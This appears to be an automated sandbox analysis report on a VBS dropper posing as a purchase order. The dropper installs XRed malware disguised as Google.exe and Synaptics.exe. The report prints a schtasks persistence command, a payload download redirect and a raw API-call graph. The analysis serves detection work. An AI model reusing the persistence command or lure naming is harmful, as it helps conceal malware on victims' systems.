                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
2024-12-30 10:49:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-JUdFOoxT8vvMscOBzjSJeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close



                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:05:48:34
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Sheet.vbs"
                                                                                                                                                                            Imagebase:0x7ff723660000
                                                                                                                                                                            File size:170'496 bytes
                                                                                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1491991054.000001C7E4325000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1489527572.000001C7E5148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:05:48:42
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:2'208'256 bytes
                                                                                                                                                                            MD5 hash:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:4
                                                                                                                                                                            Start time:05:48:42
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                                                                                                                                                                            Imagebase:0x4b0000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000004.00000002.2732607207.0000000004372000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:7
                                                                                                                                                                            Start time:05:48:44
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:771'584 bytes
                                                                                                                                                                            MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:8
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                                                                                            Imagebase:0xa40000
                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:10
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:53'161'064 bytes
                                                                                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:11
                                                                                                                                                                            Start time:05:48:45
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                                                                                                                                                                            Imagebase:0x300000
                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2718201933.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2719329795.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000B.00000002.2719329795.0000000002B88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:12
                                                                                                                                                                            Start time:05:48:46
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                                                                                            Imagebase:0x610000
                                                                                                                                                                            File size:187'904 bytes
                                                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:13
                                                                                                                                                                            Start time:05:48:48
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:17
                                                                                                                                                                            Start time:05:48:52
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:771'584 bytes
                                                                                                                                                                            MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:05:48:58
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3184
                                                                                                                                                                            Imagebase:0x3a0000
                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:22
                                                                                                                                                                            Start time:05:49:01
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:23
                                                                                                                                                                            Start time:05:49:01
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:25
                                                                                                                                                                            Start time:05:49:06
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 3360
                                                                                                                                                                            Imagebase:0x3a0000
                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:26
                                                                                                                                                                            Start time:05:49:09
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:771'584 bytes
                                                                                                                                                                            MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:05:49:10
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:53'161'064 bytes
                                                                                                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:05:49:17
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:31
                                                                                                                                                                            Start time:05:49:26
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            File size:2'208'256 bytes
                                                                                                                                                                            MD5 hash:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:32
                                                                                                                                                                            Start time:05:49:26
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                                                                                                                                                                            Imagebase:0xac0000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                            • Detection: 61%, ReversingLabs
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:33
                                                                                                                                                                            Start time:05:49:34
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:34
                                                                                                                                                                            Start time:05:49:47
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                                                                                                                                                                            Imagebase:0xac0000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:36
                                                                                                                                                                            Start time:05:49:49
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 9672
                                                                                                                                                                            Imagebase:0x3a0000
                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            Target ID:37
                                                                                                                                                                            Start time:05:50:00
                                                                                                                                                                            Start date:30/12/2024
                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                            File size:1'436'672 bytes
                                                                                                                                                                            MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:7.5%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:36
50b9d3 SetErrorMode CoGetInstanceFromFile 103334->103337 103348 50b861 103334->103348 103336 50b802 103336->103330 103338 50b807 103336->103338 103340 50ba19 SetErrorMode 103337->103340 103341 50ba1f CoGetObject 103337->103341 104814 50c235 420 API calls Mailbox 103338->104814 103339 50b8a8 GetRunningObjectTable 103345 50b8cb 103339->103345 103346 50b8b8 103339->103346 103361 50b9b1 103340->103361 103341->103340 103344 50baa8 103341->103344 104819 50c235 420 API calls Mailbox 103344->104819 104815 50c235 420 API calls Mailbox 103345->104815 103346->103345 103362 50b8ed 103346->103362 103348->103339 103352 50b89a 103348->103352 103355 4bcdb4 48 API calls 103348->103355 103350 50bad0 VariantClear 103350->103108 103351 50b814 Mailbox 103351->103350 103352->103339 103353 50bac2 SetErrorMode 103353->103351 103354 50ba53 103356 50ba6f 103354->103356 104817 4eac4b 51 API calls Mailbox 103354->104817 103358 50b88a 103355->103358 104818 4fa6f6 103 API calls 103356->104818 103358->103352 103360 4bcdb4 48 API calls 103358->103360 103360->103352 103361->103344 103361->103354 103362->103361 104816 4eac4b 51 API calls Mailbox 103362->104816 103365 4b84a6 81 API calls 103364->103365 103366 4b81e5 103365->103366 103367 4b84a6 81 API calls 103366->103367 103368 4b81fa 103367->103368 103369 4b84a6 81 API calls 103368->103369 103370 4b820d 103369->103370 103371 4b84a6 81 API calls 103370->103371 103372 4b8223 103371->103372 103373 4b7b6e 48 API calls 103372->103373 103374 4b8237 103373->103374 103375 4b846a 103374->103375 103376 4bcdb4 48 API calls 103374->103376 103379 52d91e 103375->103379 103380 52d95f 103375->103380 103377 4b825e 103376->103377 103377->103375 103378 52d752 103377->103378 103407 4b8281 __wopenfile 103377->103407 103381 4b3320 48 API calls 103378->103381 103383 4b3320 48 API calls 103379->103383 103382 4b3320 48 API calls 103380->103382 103385 52d769 103381->103385 103386 52d96a 103382->103386 103384 52d928 103383->103384 103387 4b84a6 81 API calls 103384->103387 
103411 52d790 103385->103411 104848 4c2320 50 API calls 103385->104848 104853 4c2320 50 API calls 103386->104853 103389 52d93a 103387->103389 103393 4b80ea 48 API calls 103389->103393 103391 4b84a6 81 API calls 103394 4b8306 103391->103394 103392 52d985 103402 4b84a6 81 API calls 103392->103402 103396 52d94e 103393->103396 103397 4b84a6 81 API calls 103394->103397 103395 4b80ea 48 API calls 103395->103411 103400 4b8182 48 API calls 103396->103400 103401 4b831b 103397->103401 103398 52d7ed 103398->103375 103410 4b3320 48 API calls 103398->103410 103399 4b8182 48 API calls 103399->103411 103403 52d95c 103400->103403 103401->103375 103401->103398 103408 4b8342 103401->103408 103404 52d9a0 103402->103404 104854 4c2320 50 API calls 103403->104854 103405 4b80ea 48 API calls 103404->103405 103409 52d9b4 103405->103409 103407->103375 103407->103391 103407->103398 103430 4b8364 103407->103430 104832 4b3320 103408->104832 103415 4b8182 48 API calls 103409->103415 103416 52d84a 103410->103416 103411->103395 103411->103399 103417 4b843f Mailbox 103411->103417 104849 4c2320 50 API calls 103411->104849 103414 4b834c 103418 4bc4cd 48 API calls 103414->103418 103415->103403 104850 4c2320 50 API calls 103416->104850 103417->103108 103418->103430 103423 52d895 103424 52d8ce 103423->103424 103426 52d8bf 103423->103426 103425 4b8182 48 API calls 103424->103425 103428 52d8dc 103425->103428 104851 4bbd2f 48 API calls _memmove 103426->104851 104852 4c2320 50 API calls 103428->104852 103430->103417 103430->103423 104820 4b80ea 103430->104820 104843 4d247b 59 API calls 2 library calls 103430->104843 104844 4b8182 103430->104844 104847 4c2320 50 API calls 103430->104847 103431 52d8ee 103433 4bc4cd 48 API calls 103431->103433 103433->103375 103435 4cf48a 103434->103435 103436 4cf47f 103434->103436 103440 4b84a6 81 API calls 103435->103440 103461 4cf498 Mailbox 103435->103461 103437 4bcdb4 48 API calls 103436->103437 103437->103435 103438 4d010a 48 API calls 103439 4cf49f 103438->103439 
